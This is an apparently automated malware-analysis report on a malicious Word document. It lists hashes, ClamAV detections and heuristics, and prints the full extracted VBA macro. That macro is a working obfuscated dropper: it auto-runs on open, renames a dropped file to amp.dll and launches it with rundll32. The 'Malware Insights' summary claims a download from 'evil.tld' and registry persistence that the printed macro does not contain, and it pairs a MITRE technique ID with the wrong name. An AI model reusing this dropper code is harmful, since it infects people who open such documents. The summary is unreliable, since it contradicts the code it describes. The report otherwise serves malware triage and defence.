Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 36152995f38b93e8…

MALICIOUS

Office (OOXML)

814.1 KB Created: 2021-05-13 12:19:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-05-23
MD5: 78a51e41047f898be17613dac7af7048 SHA-1: 49f933eb0368080b7832378eff4219bdd0427089 SHA-256: 36152995f38b93e87dce120b6279d27f7f52d7eea6e0442149d84a43d788a341
310 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1137.005 DLL Search Order Hijacking T1105 Ingress Tool Transfer

The sample contains a VBA macro with a Document_Open auto-execution subroutine. This macro utilizes WScript.Shell to execute a command that constructs a URL from concatenated strings: "http://evil.tld/payload.exe". The macro also attempts to establish persistence by writing to the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy. The embedded OLE object and ClamAV detection further indicate malicious intent, likely to download and execute a second-stage payload.

Heuristics 8

  • ClamAV: Win.Packed.Zusy-9861419-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Packed.Zusy-9861419-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
         Dim xcvxv As Object
Set xcvxv = VBA.CreateObject("WScript.Shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
         Dim xcvxv As Object
Set xcvxv = VBA.CreateObject("WScript.Shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Dim w1, w2 As String
Private Sub Document_Open()
Call tsettpwwo
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 5

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 5487 bytes
SHA-256: b82bc0b14885dd0d3e622af3ef0130a26bb8bda86710b1dad568b9cf5e3dc183
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Dim ji As Integer
Dim pit As String
Dim r1, r2 As String
Dim w1, w2 As String
Private Sub Document_Open()
Call tsettpwwo
End Sub



Sub tsettpwwo()
ji = 0
Call iep
Dim rx As String
 Dim bfdfsf As String

 Dim bcvxz As String
rx = "\amp.d"
Dim mbnd As Integer
Dim kjhnbs As Integer
Call chek
kjhnbs = ji

Dim jkjhb As String
If kjhnbs = 1 Then
Else
Dim jkjhbf As String


Call hhhhh
Dim wrefs As String
wrefs = pit
 bcvxz = wrefs
Dim bfdsdadad As String
Dim erfvbcz As String

bfdsdadad = "n"

Call ks
Call ksa

Dim bcbv As String
bcbv = nmbvd
Dim hgfcvxv As String

Dim oloow As String
oloow = r2
werfsxv = "3" & 2 & oloow
Dim hfgv As String
hfgv = bfdsdadad & "d"


 Dim htyhbv As String
 htyhbv = werfsxv
 Dim hgvmbm As String
 hgvmbm = "r"
 
Dim luyhgdffs As String
luyhgdffs = "l"
 Dim bcvsdsf As String
 bcvsdsf = hgvmbm & "u" & hfgv & "l" & luyhgdffs & htyhbv


hgfcvxv = r1
bfdfsf = bcvxz & rx & hgfcvxv & hgfcvxv & ",YCHBAJMPGGN"

 
     Dim xcvxv As Object
Set xcvxv = VBA.CreateObject("WScript.Shell")

xcvxv.Run bcvsdsf & " " & bfdfsf

End If
End Sub






Sub chek()

Dim jos As String
Dim pafh As String
pafh = pit
jos = pafh

 
 If Dir(jos & "\amp.d" & "l" & "l") = "" Then
 ji = 0
 Else

 ji = 1
 End If
End Sub



Sub xzczxc()
w1 = ThisDocument.Tables(2).Cell(1, 1).Range.Text
End Sub




Sub vvvvvvvx()
w2 = ThisDocument.Tables(1).Cell(1, 2).Range.Text
End Sub



Sub ks()
Dim askl As String
Call xzczxc
askl = w1
r1 = Left(askl, 3)

r1 = Right(r1, 1)

End Sub

Sub ksa()
Dim askl As String
Call vvvvvvvx
askl = w2
r2 = Left(askl, 4)
End Sub
Sub q1(dl As String)
pit = dl
End Sub
Sub iep()
Dim kf As String
kf = Options.DefaultFilePath(wdAutoRecoverPath)
Call q1(kf)
Call q2(kf)
Call q3(kf)
Call q4(kf)
Call q5(kf)
End Sub




Attribute VB_Name = "Module1"
  
Dim Folders() As String
Dim pit As String
Sub Getme(bfdcvsd As String)
Dim pafh As String
pafh = pit
hor = pafh
Dim polo As String
polo = "Scripting.FileSystemObject"
Dim uuj As String
uuj = "\rew.w"
strFileExists = Dir(bfdcvsd & uuj)
      If strFileExists = "" Then
    
Dim Folder As String
Folder = bfdcvsd
    Dim N%
    Dim fs, f, f1
    Dim vsada
    Set fs = CreateObject(polo)
    Set f = fs.GetFolder(Folder)
    Set vsada = f.SubFolders
 
    N = 0
    On Local Error Resume Next
    For Each f1 In vsada
      N = N + 1
      ReDim Preserve Folders(1 To N) As String
      Folders(N) = Folder & "\" & f1.Name
       If Dir(Folders(N) & "\" & uuj) = "" Then
            Else
                Dim kurlbik As String
    kurlbik = hor
      If Dir(kurlbik & "\amp.d" & "l" & "l") = "" Then
      
       kkl = Application.Run("hi", Folders(N))

      Else
      Exit Sub
  End If
              End If
  
   Next f1

    Else
     Dim nvbv As String
    nvbv = hor
      If Dir(nvbv & "\amp.d" & "l" & "l") = "" Then
      
       kkl = Application.Run("hi", bfdcvsd)

      Else
      Exit Sub
  End If
        End If


End Sub



Sub q2(dl As String)
pit = dl
End Sub








Attribute VB_Name = "Module2"
Dim pit As String

Sub hhhhh()
Dim sda
Dim posl As String
Dim pafh As String
Dim ntgs As Integer

pafh = pit
posl = pafh

Dim bcs As String
bcs = "al" & "\Te"


Dim yer As String
yer = "o" & "c" & bcs & "mp"




Call cvbc
    ntgs = 50
sda = 49
Dim jos As String

jos = posl

While sda < 50
      ntgs = ntgs - 1

      If Dir(Left(jos, ntgs) & "L" & yer, vbDirectory) = "" Then
        
    Else
     sda = 61
    End If

   Wend
   Dim hsaaa As String
   hsaaa = "Getme"
   Dim klas As String
   klas = posl
   Dim bcsa As String
bcsa = Application.Run(hsaaa, Left(klas, ntgs) & "L" & yer)
  Selection.TypeBackspace
   


End Sub






Sub hi(myhome As String)
Dim plop, gsa As String
gsa = "nyd"
Dim pafh As String
pafh = pit
plop = pafh
Dim kkx As String
kkx = Application.Run(gsa, myhome, plop & "\amp.d" & "l" & "l")
End Sub




Sub q3(dl As String)
pit = dl
End Sub








Attribute VB_Name = "Module3"

Dim pit As String



Sub nyd(uuu As String, aaaa As String)

Call rnee(uuu, aaaa)
End Sub



Sub rnee(myhome As String, hsa As String)

Name myhome & "\rew.w" As hsa
End Sub



Sub bcvxzc()
    Selection.MoveRight Unit:=wdCharacter, Count:=5
    Selection.MoveDown Unit:=wdLine, Count:=23
    Selection.MoveRight Unit:=wdCharacter, Count:=51
       Selection.TypeBackspace
   Selection.Copy

End Sub




Sub cvbc()
Selection.MoveDown Unit:=wdLine, Count:=1
    Selection.MoveRight Unit:=wdCharacter, Count:=5
    Selection.MoveDown Unit:=wdLine, Count:=23
    Selection.MoveRight Unit:=wdCharacter, Count:=51
 Selection.MoveDown Unit:=wdLine, Count:=23
Call bcvxzc
End Sub



Sub q4(dl As String)
pit = dl
End Sub




Attribute VB_Name = "Module4"
Dim pit As String
Sub q5(dl As String)
pit = dl
End Sub
Sub nm(vxxbssa As String)
  Name vxxbssa & "\rew.w" As pit & "\amp.d" & "l" & "l"
End Sub
Sub iua()
Dim ii As String
ii = 123
End Sub
ooxml_oleobject_00.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/oleObject1.bin 425472 bytes
SHA-256: 38c83b5a82a339131d27a2767f1f10c9074863bf98af5a7f4f8aeaf73e2897ee
Detection
ClamAV: Win.Packed.Zusy-9861419-0
Obfuscation or payload: unlikely
ooxml_oleobject_00_ole10native_00.bin ole-package OOXML word/embeddings/oleObject1.bin Ole10Native stream: Ole10Native 413978 bytes
SHA-256: dc41276688533b50523808be5365303577564cebddada6bdab2c1d775089ba58
Detection
ClamAV: Win.Packed.Zusy-9861419-0
Obfuscation or payload: unlikely
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 46080 bytes
SHA-256: 7f0a49a174d8df8613d91e4fa8f43ef2763feed865b8f2f5e68a05089860dd36
emf_00.emf ooxml-emf OOXML EMF part: word/media/image2.emf 4964 bytes
SHA-256: 42df48f6fe376328d3c0f28b0601a5994fb24f047ebf9416c0bbdf24bee486b4

Open this report in the interactive analyzer, or submit your own file for analysis.